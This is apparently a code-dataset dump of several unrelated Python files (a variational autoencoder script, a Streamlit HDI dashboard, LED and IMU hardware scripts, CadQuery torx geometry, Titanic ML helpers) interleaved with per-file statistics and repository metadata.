# Define a subgraph of the full model, corresponding to a minibatch of
# size M.
z = Normal(loc=tf.zeros([FLAGS.M, FLAGS.d]),
scale=tf.ones([FLAGS.M, FLAGS.d]))
hidden = tf.layers.dense(z, 256, activation=tf.nn.relu)
x = Bernoulli(logits=tf.layers.dense(hidden, 28 * 28))
# INFERENCE
# Define a subgraph of the variational model, corresponding to a
# minibatch of size M.
x_ph = tf.placeholder(tf.int32, [FLAGS.M, 28 * 28])
hidden = tf.layers.dense(tf.cast(x_ph, tf.float32), 256,
activation=tf.nn.relu)
qz = Normal(loc=tf.layers.dense(hidden, FLAGS.d),
scale=tf.layers.dense(
hidden, FLAGS.d, activation=tf.nn.softplus))
# Bind p(x, z) and q(z | x) to the same TensorFlow placeholder for x.
inference = ed.KLqp({z: qz}, data={x: x_ph})
optimizer = tf.train.RMSPropOptimizer(0.01, epsilon=1.0)
inference.initialize(optimizer=optimizer)
tf.global_variables_initializer().run()
n_iter_per_epoch = x_train.shape[0] // FLAGS.M
for epoch in range(1, FLAGS.n_epoch + 1):
print("Epoch: {0}".format(epoch))
avg_loss = 0.0
pbar = Progbar(n_iter_per_epoch)
for t in range(1, n_iter_per_epoch + 1):
pbar.update(t)
x_batch = next(x_train_generator)
info_dict = inference.update(feed_dict={x_ph: x_batch})
avg_loss += info_dict['loss']
# Print a lower bound to the average marginal likelihood for an
# image.
avg_loss /= n_iter_per_epoch
avg_loss /= FLAGS.M
print("-log p(x) <= {:0.3f}".format(avg_loss))
# Prior predictive check.
images = x.eval()
for m in range(FLAGS.M):
imsave(os.path.join(FLAGS.out_dir, '%d.png') % m,
images[m].reshape(28, 28))
if __name__ == "__main__":
tf.app.run()
| 31.731481
| 77
| 0.676685
| 522
| 3,427
| 4.293103
| 0.356322
| 0.018742
| 0.029005
| 0.023204
| 0.091923
| 0.055332
| 0.033021
| 0.033021
| 0
| 0
| 0
| 0.020158
| 0.189378
| 3,427
| 107
| 78
| 32.028037
| 0.786537
| 0.195214
| 0
| 0
| 0
| 0
| 0.048664
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.157143
| 0
| 0.185714
| 0.042857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a804975ed4327041257e7e887706be1ffc7b7803
| 2,829
|
py
|
Python
|
app.py
|
Raisler/Brazil_HDI_DataVisualization
|
76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c
|
[
"MIT"
] | null | null | null |
app.py
|
Raisler/Brazil_HDI_DataVisualization
|
76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c
|
[
"MIT"
] | null | null | null |
app.py
|
Raisler/Brazil_HDI_DataVisualization
|
76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c
|
[
"MIT"
] | null | null | null |
import streamlit as st
import pandas as pd
import numpy as np
import plotly.express as px
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import matplotlib.pyplot as plt
def load_data(data):
data=pd.read_csv(data)
return data
df = load_data('hdi.csv')
st.title('Human Development Index in Brazil')
select = st.sidebar.selectbox('Choose', ['Home', 'Analysis by Year', 'Analysis by State'])
if select == 'Home':
st.write('That is a dashboard to see the HDI of all states in Brazil, you can see graphics and values!')
st.write('In soon, more improvements. #Version 1')
st.write('In the sidebar, choose your option for the better view for you!')
st.write('Author: Raisler Voigt | suggestions? raisler.dev@gmail.com')
st.markdown('''<p align="center">
<a href="https://www.instagram.com/raislervoigt/" target="_blank" rel="noopener noreferrer">Instagram</a> •
<a href="https://twitter.com/VoigtRaisler" target="_blank" rel="noopener noreferrer">Twitter</a> •
<a href="https://www.linkedin.com/in/raisler-voigt7/" target="_blank" rel="noopener noreferrer">Linkedin</a> •
<a href="https://github.com/Raisler" target="_blank" rel="noopener noreferrer">GitHub</a>
</p>''', unsafe_allow_html=True)
if select == 'Analysis by Year':
select1 = st.sidebar.selectbox('Análise por Ano', [2017, 2010, 2000, 1991])
fig1 = px.scatter(df, x="HDI Health {0}".format(select1), y="HDI Education {0}".format(select1), size="HDI {0}".format(select1), color="UF")
fig2 = px.histogram(df, x="UF", y = "HDI {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig3 = px.histogram(df, x="UF", y = "HDI Education {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig4 = px.histogram(df, x="UF", y = "HDI Health {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig5 = px.histogram(df, x="UF", y = "HDI Wealth {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig6 = df[['UF', "HDI Education {0}".format(select1), "HDI Health {0}".format(select1), "HDI Wealth {0}".format(select1)]]
st.write(fig1)
st.write(fig2)
st.subheader('HDI Education')
st.write(fig3)
st.subheader('HDI Health')
st.write(fig4)
st.subheader('HDI Wealth')
st.write(fig5)
st.write(fig6)
if select == 'Analysis by State':
select2 = st.sidebar.selectbox('Choose the State', df['UF'])
cdf = df
cdf.index = cdf['UF']
state = cdf.index == '{}'.format(select2)
state = cdf[state]
trans = state.transpose()
trans = trans.sort_index(ascending = False)
fig1 = px.histogram(x = trans.index, y = trans['{}'.format(select2)]).update_xaxes(categoryorder='total descending')
fig2 = state.transpose()
st.write(fig1)
st.write(fig2)
| 40.414286
| 144
| 0.679392
| 409
| 2,829
| 4.665037
| 0.342298
| 0.044025
| 0.073375
| 0.075996
| 0.357442
| 0.194969
| 0.15304
| 0.111111
| 0
| 0
| 0
| 0.024237
| 0.154118
| 2,829
| 69
| 145
| 41
| 0.771835
| 0
| 0
| 0.075472
| 0
| 0.09434
| 0.392011
| 0.04065
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018868
| false
| 0
| 0.132075
| 0
| 0.169811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a804e02acc0b6d5ed28538bc5bf647eab91b6259
| 657
|
py
|
Python
|
Examples/pycomBlink/main.py
|
sophie-bernier/RemoteOceanAcidificationMonitor
|
6a8b799826a2eb9b1d5064883193c61eea0ee310
|
[
"Unlicense"
] | 1
|
2021-06-22T23:07:31.000Z
|
2021-06-22T23:07:31.000Z
|
Examples/pycomBlink/main.py
|
sophie-bernier/RemoteOceanAcidificationMonitor
|
6a8b799826a2eb9b1d5064883193c61eea0ee310
|
[
"Unlicense"
] | null | null | null |
Examples/pycomBlink/main.py
|
sophie-bernier/RemoteOceanAcidificationMonitor
|
6a8b799826a2eb9b1d5064883193c61eea0ee310
|
[
"Unlicense"
] | null | null | null |
# main.py
import pycom
import time
pycom.heartbeat(False)
red = 0x08
blue = 0x00
green = 0x00
sleepTime = 0.01
def setRgb(red, green, blue):
rgbValue = 0x000000
rgbValue |= (red << 16) | (green << 8) | blue
pycom.rgbled(rgbValue)
return
while True:
###
#if red >= 0x08:
# if green > 0:
# green -= 1
# else:
# blue += 1
#if blue >= 0x08:
# if red > 0:
# red -= 1
# else:
# green += 1
#if green >= 0x08:
# if blue > 0:
# blue -= 1
# else:
# red += 1
###
setRgb(red, green, blue)
time.sleep(sleepTime)
| 16.425
| 49
| 0.464231
| 77
| 657
| 3.961039
| 0.376623
| 0.059016
| 0.091803
| 0.118033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101266
| 0.398782
| 657
| 39
| 50
| 16.846154
| 0.670886
| 0.35312
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8054920242ac3e7b7e99120e329e53db3f718af
| 1,891
|
py
|
Python
|
dsn/pp/construct.py
|
expressionsofchange/nerf0
|
788203619fc89c92e8c7301d62bbc4f1f4ee66e1
|
[
"MIT"
] | 2
|
2019-04-30T05:42:05.000Z
|
2019-08-11T19:17:20.000Z
|
dsn/pp/construct.py
|
expressionsofchange/nerf0
|
788203619fc89c92e8c7301d62bbc4f1f4ee66e1
|
[
"MIT"
] | null | null | null |
dsn/pp/construct.py
|
expressionsofchange/nerf0
|
788203619fc89c92e8c7301d62bbc4f1f4ee66e1
|
[
"MIT"
] | null | null | null |
from spacetime import get_s_address_for_t_address
from s_address import node_for_s_address
from dsn.s_expr.structure import TreeText
from dsn.pp.structure import PPNone, PPSingleLine, PPLispy, PPAnnotatedSExpr
from dsn.pp.clef import PPUnset, PPSetSingleLine, PPSetLispy
def build_annotated_tree(node, default_annotation):
if isinstance(node, TreeText):
annotated_children = []
else:
annotated_children = [build_annotated_tree(child, default_annotation) for child in node.children]
return PPAnnotatedSExpr(
node,
default_annotation,
annotated_children,
)
def construct_pp_tree(tree, pp_annotations):
"""Because pp notes take a t_address, they can be applied on future trees (i.e. the current tree).
The better (more general, more elegant and more performant) solution is to build the pp_tree in sync with the
general tree, and have construct_pp_tree be a function over notes from those clefs rather than on trees.
"""
annotated_tree = build_annotated_tree(tree, PPNone())
for annotation in pp_annotations:
pp_note = annotation.annotation
s_address = get_s_address_for_t_address(tree, pp_note.t_address)
if s_address is None:
continue # the node no longer exists
annotated_node = node_for_s_address(annotated_tree, s_address)
if isinstance(pp_note, PPUnset):
new_value = PPNone()
elif isinstance(pp_note, PPSetSingleLine):
new_value = PPSingleLine()
elif isinstance(pp_note, PPSetLispy):
new_value = PPLispy()
else:
raise Exception("Unknown PP Note")
# let's just do this mutably first... this is the lazy approach (but that fits with the caveats mentioned at the
# top of this method)
annotated_node.annotation = new_value
return annotated_tree
| 35.679245
| 120
| 0.710206
| 253
| 1,891
| 5.086957
| 0.391304
| 0.049728
| 0.041958
| 0.021756
| 0.034188
| 0.034188
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230566
| 1,891
| 52
| 121
| 36.365385
| 0.884536
| 0.248017
| 0
| 0.060606
| 0
| 0
| 0.010707
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.151515
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8065cec94c9ac0bb277d2b7b2c4a7aa013dd5ba
| 3,285
|
py
|
Python
|
pallet.py
|
sprightlyManifesto/cadQuery2
|
207a1ff2420210460539400dfd1945e8b7245497
|
[
"MIT"
] | 1
|
2021-05-31T00:08:02.000Z
|
2021-05-31T00:08:02.000Z
|
pallet.py
|
sprightlyManifesto/cadQuery2
|
207a1ff2420210460539400dfd1945e8b7245497
|
[
"MIT"
] | null | null | null |
pallet.py
|
sprightlyManifesto/cadQuery2
|
207a1ff2420210460539400dfd1945e8b7245497
|
[
"MIT"
] | null | null | null |
from cadquery import *
from math import sin,cos,acos,asin,pi,atan2
class Pallet:
def __init__(self):
self.torx6 = { 6:(1.75,1.27), 8:(2.4,1.75), 10:(2.8,2.05), 15:(3.35,2.4), 20:(3.95,2.85),
25:(4.50,3.25), 30:(5.6,4.05), 40:(6.75,4.85),45:(7.93,5.64), 50:(8.95,6.45),
55:(11.35,8.05),60:(13.45,9.6),70:(15.7,11.2),80:(17.75,12.8),90:(20.2,14.4),
100:(22.4,16)}
def radialSlot(self,wp,slotRad, cutterRad, a1, a2,offset=(0,0)):
if slotRad > cutterRad:
IR = slotRad-cutterRad
OR = slotRad+cutterRad
middle = a1+(a2-a1)/2
result = (wp.moveTo(IR*sin(a1),IR*cos(a1))
.threePointArc((IR*sin(middle),IR*cos(middle)),(IR*sin(a2),IR*cos(a2)))
.tangentArcPoint((cutterRad*2*sin(a2),cutterRad*2*cos(a2)))
.threePointArc((OR*sin(middle),OR*cos(middle)),(OR*sin(a1),OR*cos(a1)))
.tangentArcPoint((-cutterRad*2*sin(a1),-cutterRad*2*cos(a1))).close()
)
else:
result = wp
#log("issues")
return(result)
def hexAF(self,wp,af):
R = af/cos(pi/6)/2
return wp.moveTo(-sin(pi/6)*R,af/2).lineTo(sin(pi/6)*R,af/2).lineTo(R,0)\
.lineTo(sin(pi/6)*R,-af/2).lineTo(-sin(pi/6)*R,-af/2).lineTo(-R,0).close()
def torx(self,wp,no):
A , B = self.torx6[no]
re=A*0.1
ri=A*0.175
x = ri*(sin(pi/6)*(A/2-re))/(re + ri)
y1 = B/2 + ri
y2 = cos(pi/6)*(A/2 - re)
y = y1 - ri*((y1 -y2))/(re + ri)
#log(f"x:{x} y1:{y1} y2:{y2}")
phi = atan2(x,y)
#log(f"phi:{round(phi,2)} x:{round(x,2)} y:{round(y,2)} re:{round(re,2)} ri:{round(ri,2)}")
R = (x**2+y**2)**0.5
Rm = A/2
B = B/2
res = wp.moveTo(R*sin(-phi),R*cos(-phi)).threePointArc((0,B),(R*sin(phi),R*cos(phi))) \
.threePointArc((Rm*sin(pi/6),Rm*cos(pi/6)),(R*sin(pi/3-phi),R*cos(pi/3-phi))) \
.threePointArc((B*sin(pi/3), B*cos(pi/3)),(R*sin(phi+pi/3),R*cos(phi+pi/3))) \
.threePointArc((Rm*sin(3*pi/6),Rm*cos(3*pi/6)),(R*sin(2*pi/3-phi),R*cos(2*pi/3-phi))) \
.threePointArc((B*sin(2*pi/3), B*cos(2*pi/3)),(R*sin(phi+2*pi/3),R*cos(phi+2*pi/3))) \
.threePointArc((Rm*sin(5*pi/6),Rm*cos(5*pi/6)),(R*sin(3*pi/3-phi),R*cos(3*pi/3-phi))) \
.threePointArc((B*sin(3*pi/3), B*cos(3*pi/3)),(R*sin(phi+3*pi/3),R*cos(phi+3*pi/3))) \
.threePointArc((Rm*sin(7*pi/6),Rm*cos(7*pi/6)),(R*sin(4*pi/3-phi),R*cos(4*pi/3-phi))) \
.threePointArc((B*sin(4*pi/3), B*cos(4*pi/3)),(R*sin(phi+4*pi/3),R*cos(phi+4*pi/3))) \
.threePointArc((Rm*sin(9*pi/6),Rm*cos(9*pi/6)),(R*sin(5*pi/3-phi),R*cos(5*pi/3-phi))) \
.threePointArc((B*sin(5*pi/3), B*cos(5*pi/3)),(R*sin(phi+5*pi/3),R*cos(phi+5*pi/3))) \
.threePointArc((Rm*sin(11*pi/6),Rm*cos(11*pi/6)),(R*sin(6*pi/3-phi),R*cos(6*pi/3-phi))) \
.close()
return res
if __name__== "__main__":
p = Pallet()
ks = list(p.torx6.keys())
ks.reverse()
a = cq.Workplane().circle(12).extrude(-3)
for k in ks:
a = a.union(p.torx(a.faces(">Z").workplane(),k).extrude(1))
| 48.308824
| 101
| 0.497717
| 626
| 3,285
| 2.592652
| 0.178914
| 0.05915
| 0.044362
| 0.029575
| 0.321627
| 0.149723
| 0.078866
| 0.045595
| 0.041898
| 0.041898
| 0
| 0.111997
| 0.236225
| 3,285
| 68
| 102
| 48.308824
| 0.534874
| 0.040487
| 0
| 0
| 0
| 0
| 0.003175
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067797
| false
| 0
| 0.033898
| 0
| 0.152542
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8094575efb5f9d3bcb611dcb83074209e70f07f
| 478
|
py
|
Python
|
Algorithms/Easy/830. Positions of Large Groups/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
Algorithms/Easy/830. Positions of Large Groups/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
Algorithms/Easy/830. Positions of Large Groups/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
class Solution:
def largeGroupPositions(self, S: str) -> List[List[int]]:
l = []
start = end = 0
while start < len(S):
while end < len(S) and S[start] == S[end]:
end += 1
if end - start >= 3:
l.append([start, end - 1])
start = end
return l
if __name__ == "__main__":
s = Solution()
result = s.largeGroupPositions("abc")
print(result)
| 22.761905
| 61
| 0.493724
| 57
| 478
| 4
| 0.508772
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013468
| 0.378661
| 478
| 20
| 62
| 23.9
| 0.754209
| 0
| 0
| 0
| 0
| 0
| 0.023013
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.0625
| 0
| 0.25
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a80a22c9f777e08edf7fe7ed83b93c4fd1e307bc
| 1,727
|
py
|
Python
|
imu.py
|
aume1/SatelliteTracker
|
62725e1d1a72a1350b2af15d9e33fcd574ceb3a2
|
[
"MIT"
] | 2
|
2021-06-19T17:17:30.000Z
|
2021-06-19T17:17:39.000Z
|
imu.py
|
aume1/SatelliteTracker
|
62725e1d1a72a1350b2af15d9e33fcd574ceb3a2
|
[
"MIT"
] | null | null | null |
imu.py
|
aume1/SatelliteTracker
|
62725e1d1a72a1350b2af15d9e33fcd574ceb3a2
|
[
"MIT"
] | 1
|
2021-06-19T17:18:32.000Z
|
2021-06-19T17:18:32.000Z
|
import time
import math
import py_qmc5883l
import pigpio
import adafruit_bmp280
from i2c_ADXL345 import ADXL345
import numpy as np
from i2c_ITG3205 import Gyro
class IMU:
def __init__(self, pi):
self.gyro = Gyro(pi)
self.accel = ADXL345(pi)
self.mag = py_qmc5883l.QMC5883L(pi)
rpy = list(self.get_roll_pitch_yaw())
self._prev_time = time.time()
def get_accel(self):
return self.accel.get_xyz_accel()
def get_gyro(self):
return self.gyro.get_rotations()
def get_mag(self):
return self.mag.get_dir()
def get_north(self):
D = self.get_accel()
D_mag = math.sqrt(D[0]**2 + D[1]**2 + D[2]**2)
D = [x/D_mag for x in D]
# D = [x for x in acc_unit] # used to be negative, flipped sensor so it is positive now
E = np.cross(D, self.get_mag()) # east is the cross-product of down and the direction of magnet
e_mag = math.sqrt(E[0]**2 + E[1]**2 + E[2]**2)
E /= e_mag
N = np.cross(E, D) # north is the cross-product of east and down
n_mag = math.sqrt(N[0] ** 2 + N[1] ** 2 + N[2] ** 2)
N /= n_mag
return N
def get_roll_pitch_yaw(self):
x, y, z = self.get_accel()
x_Buff = float(x)
y_Buff = float(y)
z_Buff = float(z)
roll = 180 + math.atan2(y_Buff, z_Buff) * 57.3
pitch = math.atan2((- x_Buff), math.sqrt(y_Buff * y_Buff + z_Buff * z_Buff)) * 57.3
if roll > 180:
roll -= 360
yaw = self.mag.get_bearing()
return roll, pitch, yaw
if __name__ == "__main__":
pi = pigpio.pi('192.168.178.229')
imu = IMU(pi)
while True:
print(imu.get_roll_pitch_yaw())
| 28.311475
| 104
| 0.579618
| 286
| 1,727
| 3.300699
| 0.307692
| 0.03178
| 0.050847
| 0.047669
| 0.105932
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063167
| 0.294152
| 1,727
| 60
| 105
| 28.783333
| 0.711239
| 0.110596
| 0
| 0
| 0
| 0
| 0.015023
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.166667
| 0.0625
| 0.416667
| 0.020833
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a80b6a8d0bacba13b3fe61daf36962d8ad3001a4
| 8,892
|
py
|
Python
|
src/titanic/tit_utils.py
|
buffbob/titanic
|
1e52814076ad78f6f9845d7b8f829889977a907b
|
[
"MIT"
] | null | null | null |
src/titanic/tit_utils.py
|
buffbob/titanic
|
1e52814076ad78f6f9845d7b8f829889977a907b
|
[
"MIT"
] | null | null | null |
src/titanic/tit_utils.py
|
buffbob/titanic
|
1e52814076ad78f6f9845d7b8f829889977a907b
|
[
"MIT"
] | null | null | null |
import pandas as pd
from sklearn.model_selection import GridSearchCV, train_test_split, cross_val_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score, classification_report
import matplotlib.pyplot as plt
import numpy as np
import category_encoders as ce
from sklearn.preprocessing import StandardScaler, LabelEncoder, OneHotEncoder, OrdinalEncoder
def load_tit(path):
"""
downloads data from kaggle stored at path = "../Data/"
returns a tuple of our titanic datasets- (train,test)
"""
train = pd.read_csv(path + 'tit_train.csv')
test = pd.read_csv(path + "tit_test.csv")
return (train, test)
def gscv_results_terse(model, params, X_train, y_train, X_test, y_test):
'''
clf = a classifier, params = a dict to feed to gridsearch_cv, score_list = list of evaluation metrics
nuff said
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
clf = GridSearchCV(model, params, cv=10,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set: \n{}".format(clf.best_params_))
print('___________________________________')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.3} with a std of {:.3}'.format(np.mean(scores), np.std(scores)))
return clf
def print_gscv_results(model, params, X_train, y_train, X_test, y_test):
'''
clf = a classifier, params = a dict to feed to gridsearch_cv, score_list = list of evaluation metrics
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
print()
clf = GridSearchCV(model, params, cv=5,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set:")
print()
print(clf.best_params_)
print()
print("Grid scores on development set:")
print()
means = clf.cv_results_['mean_test_score']
stds = clf.cv_results_['std_test_score']
for mean, std, params in zip(means, stds, clf.cv_results_['params']):
print("%0.3f (+/-%0.03f) for %r"
% (mean, std * 2, params))
print()
print("Detailed classification report:")
print()
print("The model is trained on the full development set.")
print("The scores are computed on the full evaluation set.")
print()
y_true, y_pred = y_test, clf.predict(X_test)
print(classification_report(y_true, y_pred))
print('________________________________________________')
print('best params for model are {}'.format(clf.best_params_))
print('\n___________________________________\n')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.2}\n\n'.format(np.mean(scores)))
return clf
def visualize_classifier(model, X, y, ax=None, cmap='rainbow'):
"""
X is a 2D dataset
nuf said
"""
ax = ax or plt.gca()
# Plot the training points
ax.scatter(X.iloc[:, 0], X.iloc[:, 1], c=y, s=30, cmap=cmap,
clim=(y.min(), y.max()), zorder=3)
ax.axis('tight')
ax.axis('off')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# fit the estimator
model.fit(X, y)
xx, yy = np.meshgrid(np.linspace(*xlim, num=200),
np.linspace(*ylim, num=200))
Z = model.predict(np.c_[xx.ravel(), yy.ravel()]).reshape(xx.shape)
# Create a color plot with the results
n_classes = len(np.unique(y))
contours = ax.contourf(xx, yy, Z, alpha=0.3,
levels=np.arange(n_classes + 1) - 0.5,
cmap=cmap, clim=(y.min(), y.max()),
zorder=1)
ax.set(xlim=xlim, ylim=ylim)
# this dataset has unique cols so we will go through one by one
def pp_Embarked(df):
"""
simply adds 'C' where missing values are present
inplace imputation
return df
"""
df.Embarked.fillna("C", inplace=True)
return df
def pp_Name(df):
"""
extracts the title from the Name column
returns- df with a new column named Title appended to original df
"""
temp = df.Name.apply(lambda x: x.split(',')[1].split(".")[0].strip())
df['Title'] = temp
return df
def pp_Age(df):
"""
imputes missing values of age through a groupby([Pclass,Title,isFemale])
returns df with new column named Age_nonull appended to it
"""
transformed_Age = df.groupby(["Title", 'Pclass', "Sex"])['Age'].transform(lambda x: x.fillna(x.median()))
df['Age_nonull'] = transformed_Age
return df
def pp_Fare(df):
'''
This will clip outliers to the middle 98% of the range
'''
temp = df['Fare'].copy()
limits = np.percentile(temp, [1, 99])
df.Fare = np.clip(temp, limits[0], limits[1])
return df
def pp_AgeBin(df):
"""
takes Age_nonull and puts in bins
returns df with new column- AgeBin
"""
z = df.Age_nonull.round() # some values went to 0 so clip to 1
binborders = np.linspace(0, 80, 17)
z = z.clip(1, None)
z = z.astype("int32")
df['AgeBin'] = pd.cut(z, bins=binborders, labels=False)
return df
def pp_Sex(df):
"""
maps male and female to 0 and 1
returns the df with is_Female added
"""
df['is_Female'] = df.Sex.apply(lambda row: 0 if row == "male" else 1) # one way
return df
def pp_Cabin(df):
"""
extracts the deck from the cabin. Mostly 1st class has cabin assignments. Replace
nan with "unk". Leaves as an ordinal categorical. can be onehoted later.
returns the df with Deck added as a column
"""
df["Deck"] = "UNK"
temp = df.loc[df.Cabin.notnull(), :].copy()
temp['D'] = temp.Cabin.apply(lambda z: z[0])
df.iloc[temp.index, -1] = temp["D"]
# df.where(df.Deck != "0", "UNK")
return df
def oneHot(df,col_list):
for col in col_list:
newcol_names = []
oh = OneHotEncoder(dtype="uint8",categories='auto')
# must convert df/series to array for onehot
vals = df[[col]].values
temp = oh.fit_transform(vals).toarray()#converts sparse to normal array
# the new names for columns
for name in oh.categories_[0]:
newcol_names.append(col + "_" + str(name))
tempdf = pd.DataFrame(temp, columns = newcol_names)
df = pd.concat([df, tempdf], axis=1)
return df
def scaleNumeric(df, cols):
"""
Standardize features by removing the mean and scaling to unit variance
"""
ss = StandardScaler()
scaled_features = ss.fit_transform(df[cols].values)
for i, col in enumerate(cols):
df[col + "_scaled"] = scaled_features[:, i]
return df
def chooseFeatures(df, alist):
"""
df is our dataframe with all new features added
alist is a list of cols to select for a new dataframe
returns df[alist]
"""
return df[alist]
def test_dtc(alist, df, labels):
"""
tests a decision tree model for classification
prints out way to much stuff
returns a GridSearchCV classifier
"""
a = df[alist] # select columns
X_train, X_test, y_train, y_test = train_test_split(a, labels, test_size=0.2, random_state=42)
dtc = DecisionTreeClassifier()
dtc_dict = dt_dict = [{"max_depth": [2, 5, 8, 12, 15], "min_samples_leaf": [1, 2, 3],
"max_features": [None, 1.0, 2, 'sqrt', X_train.shape[1]]}]
clf = gscv_results_terse(dtc, dtc_dict, X_train, y_train, X_test, y_test)
return clf
#########################################################
# some utilities functions to aid in ml in general
def lin_to_log_even(min_num, max_num, num_pts=10):
"""
This really only needed in min_num << 1 and min_max >> 1
creates an evenly spaced log space from min_num to max_num
"""
lmin = np.log10(min_num)
lmax = np.log10(max_num)
ls = np.linspace(lmin, lmax, num_pts)
log_spaces = np.power(10, ls)
# print(["{:05f}".format(each) for each in log_spaces])
return log_spaces
def lin_to_log_random(num1, num2, num_pts=10):
"""
This really only needed in min_num << 1 and min_max >> 1
creates an array of random selected pts of len num_pts
each point is in the log space from min_num to max_num
"""
ln1 = np.log10(num1)
ln2 = np.log10(num2)
range_bn = np.abs(ln2 - ln1)
z = ln2 + np.random.rand(num_pts) * -range_bn
zz = np.power(10, z)
print(["{:05f}".format(each) for each in zz])
return zz
| 31.870968
| 109
| 0.624944
| 1,293
| 8,892
| 4.08894
| 0.273782
| 0.016645
| 0.018725
| 0.015888
| 0.237375
| 0.198979
| 0.198979
| 0.188765
| 0.164933
| 0.164933
| 0
| 0.017174
| 0.246964
| 8,892
| 279
| 110
| 31.870968
| 0.772401
| 0.233468
| 0
| 0.230263
| 0
| 0
| 0.137084
| 0.018962
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111842
| false
| 0
| 0.052632
| 0
| 0.269737
| 0.197368
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a80cfdeae5dd9779dfdf75f7f464b230527883ae
| 1,167
|
py
|
Python
|
src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py
|
BoKleynen/P-O-3-Smart-Energy-Home
|
4849038c47199aa0a752ff5a4f2afa91f4a9e8f0
|
[
"MIT"
] | null | null | null |
src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py
|
BoKleynen/P-O-3-Smart-Energy-Home
|
4849038c47199aa0a752ff5a4f2afa91f4a9e8f0
|
[
"MIT"
] | null | null | null |
src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py
|
BoKleynen/P-O-3-Smart-Energy-Home
|
